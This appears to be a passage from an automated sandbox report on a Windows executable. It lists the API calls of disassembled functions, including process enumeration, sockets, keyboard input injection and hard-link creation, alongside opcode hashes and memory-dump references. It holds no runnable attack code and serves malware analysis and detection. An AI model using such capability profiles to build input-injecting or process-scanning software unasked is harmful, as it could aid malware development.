                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9423f2570821099106563df206fa942897a9d51e7e85b1b84b05a7f3248e971f
                                                                                                                                                                                                                                                                            • Instruction ID: 17e2f6cb92bb4f14f08f08d486f03173cf68ca8e4f5f174cefa2e15eb359fa40
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9423f2570821099106563df206fa942897a9d51e7e85b1b84b05a7f3248e971f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CC18B79A00206EFCB14CF94C894EAEB7B5FF48705F208598E816EB251D730EE85DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                            • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                            • Instruction ID: 671a9cdabac206ed96381b1d018025bf732e37263a240d254fdd2886d5c7fad2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CA1AC72D003A6DFDB2ADF18E8917AEBBE4EF11310F1441ADE5A59BA91C3389E41C750
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C90BD4,?), ref: 00C50EE0
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C90BD4,?), ref: 00C50EF8
                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00C8DCE0,000000FF,?,00000000,00000800,00000000,?,00C90BD4,?), ref: 00C50F1D
                                                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00C50F3E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                                                                                                                                                            • Opcode ID: 88818deda5d25905fd467b14c7d14c006889c1befc29976840043458deb075f1
                                                                                                                                                                                                                                                                            • Instruction ID: dfda971d62b90ca828d48b729e0f0398e510aa783d5c1f7790e8e65bf8612f3e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88818deda5d25905fd467b14c7d14c006889c1befc29976840043458deb075f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10811C75900109EFCB04DF94C984EEEB7B9FF89315F204558E916EB250DB71AE4ACB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7B10C
                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C7B11A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C7B1FC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7B20B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C34D73,?), ref: 00C0E395
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                            • Opcode ID: 006fa8e24c44358961c8fbf029b33b1f6d14ee2db156919c24afc8fd4e2e8650
                                                                                                                                                                                                                                                                            • Instruction ID: 491d450765a66b550f6ad9ad82a11590741b4eae8ffb8694e40231174eb84fba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 006fa8e24c44358961c8fbf029b33b1f6d14ee2db156919c24afc8fd4e2e8650
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08514A71508304AFD710EF24C886A6FBBE8FF89754F40895DF59997291DB70D908CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                            • Opcode ID: e20c77f8b5d2f6de9f357c79e8d10263eb5378a2f5b2d5252bd7029d87cec9ff
                                                                                                                                                                                                                                                                            • Instruction ID: 295b5e296e6920243dc8b4945b72218a89dfc025d9855b6ea7ba8285ea2625a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e20c77f8b5d2f6de9f357c79e8d10263eb5378a2f5b2d5252bd7029d87cec9ff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80413931A20110AFDB207FBE9C46ABE3AA4EF43730F1D4625FC29D61D1DA35494277A6
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00C7255A
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C72568
                                                                                                                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C725E7
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C725F1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5f1e46db7a35c7e070ca608569d5fe6f6ad7ba347d8702a01c779fd4f37776de
                                                                                                                                                                                                                                                                            • Instruction ID: 2e8025e55172a5194d77a1f6c1d45138184dfecbc4ec89ec4468093ca5a1bddc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1e46db7a35c7e070ca608569d5fe6f6ad7ba347d8702a01c779fd4f37776de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1741B274A00204AFE720AF24C886F3A77E5AB44758F54C488FA5A8F2D3D772ED41CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C86D1A
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C86D4D
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C86DBA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                            • Opcode ID: 59ee2a7b79c283b50520ea2bab3c5f18c6683afd750d0fa0426c3eb60b39f78e
                                                                                                                                                                                                                                                                            • Instruction ID: a161ec437a425bd59e7ab5a5a658880bc48c037d25e378d150a5144b50a1e8b6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59ee2a7b79c283b50520ea2bab3c5f18c6683afd750d0fa0426c3eb60b39f78e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF510C74A00209EFCF24EF64D980AAE7BB6FF44364F10855AF9659B290D770EE81CB54
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b43e7faec8e885e26ea3f979f5627569d23f20700b28ebd7432196cd2e40103d
                                                                                                                                                                                                                                                                            • Instruction ID: fc32278cad3edb237cd3c3ae9f6aa945c011f58eeecc94ed84555bb855c07c4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b43e7faec8e885e26ea3f979f5627569d23f20700b28ebd7432196cd2e40103d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61412871A00714AFD724AF78DC41BAABBECEB88710F10852EF159DB6D1D7729E419780
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C661C8
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C661EE
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C66213
                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C6623F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                            • Opcode ID: f1d8fd3d35105a8d422360eac637e4acb7e5277e903bc0de0415e1b2c9f7feff
                                                                                                                                                                                                                                                                            • Instruction ID: 73d99253bac9c129bdf0cc04a58ebb909d046e0e1c32b46a99b2d6ce6097babf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1d8fd3d35105a8d422360eac637e4acb7e5277e903bc0de0415e1b2c9f7feff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56414F35600615DFCF21EF15C585A2DBBF2EF89710B198488E95A9B362CB30FD45CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C5B473
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 00C5B48F
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C5B4FD
                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C5B54F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                            • Opcode ID: 422d6897a5ff0781a2d8850e3158d9ff24f1c17b85395e0daafc7c2b233d7384
                                                                                                                                                                                                                                                                            • Instruction ID: 8c11f76648512be67c181a289f9ad22d7af31004f93e5dd8820f8cfa5ff88253
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 422d6897a5ff0781a2d8850e3158d9ff24f1c17b85395e0daafc7c2b233d7384
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2315974A00208AEFF358B258805BFE7FB5AB44312F44821AF8A6561D2D3748EC9975E
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C5B5B8
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C5B5D4
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C5B63B
                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C5B68D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                            • Opcode ID: ec2e8d59e8d5fbf9a7afb79055c5e16ca71ba3afc32bf54a56faca6dbbfc5fe0
                                                                                                                                                                                                                                                                            • Instruction ID: 76fa7a3305bf460a218747b4c2dd997dc8b132fc067218a75a1742a47bc1ec27
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec2e8d59e8d5fbf9a7afb79055c5e16ca71ba3afc32bf54a56faca6dbbfc5fe0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70314F349006089EFF388B2588057FEBFA5AF44312F04422AF855561D1DB74CFC99B59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00C880D4
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C8814A
                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00C8815A
                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C881C6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                            • Opcode ID: 097ff5b216423d1e6f21f5ca0a3ac860e1f26a25c6f983ce8caed89c865e2f60
                                                                                                                                                                                                                                                                            • Instruction ID: 6492c3c05a5abafd3737f91da9dbcf59a7e06ce29c2f4d25a90b80d5077974a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 097ff5b216423d1e6f21f5ca0a3ac860e1f26a25c6f983ce8caed89c865e2f60
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9441BD30A00214DFCB11EF58C888FADB7F5BF45318F9440A8E9159B6A1CF70E94ACB44
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C82187
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C543AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetCurrentThreadId.KERNEL32 ref: 00C543B4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C52F00), ref: 00C543BB
                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 00C8219B
                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00C821E8
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C821EE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                            • Opcode ID: e1f99ff4a2ba0e0f42b88a57cd75b8956d4da163c221543d00196ee0a17cd628
                                                                                                                                                                                                                                                                            • Instruction ID: 7e1884f07f3f6a317ade2891b135f5fd07cfa6befe59c84530810bc5b60ac0cc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1f99ff4a2ba0e0f42b88a57cd75b8956d4da163c221543d00196ee0a17cd628
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A63121B5D0010DAFCB04EFA5C885DBEB7F9EF48304B5044AAE515E7251DA71DE45CBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E8E2
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E8F9
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E924
                                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C5E92F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
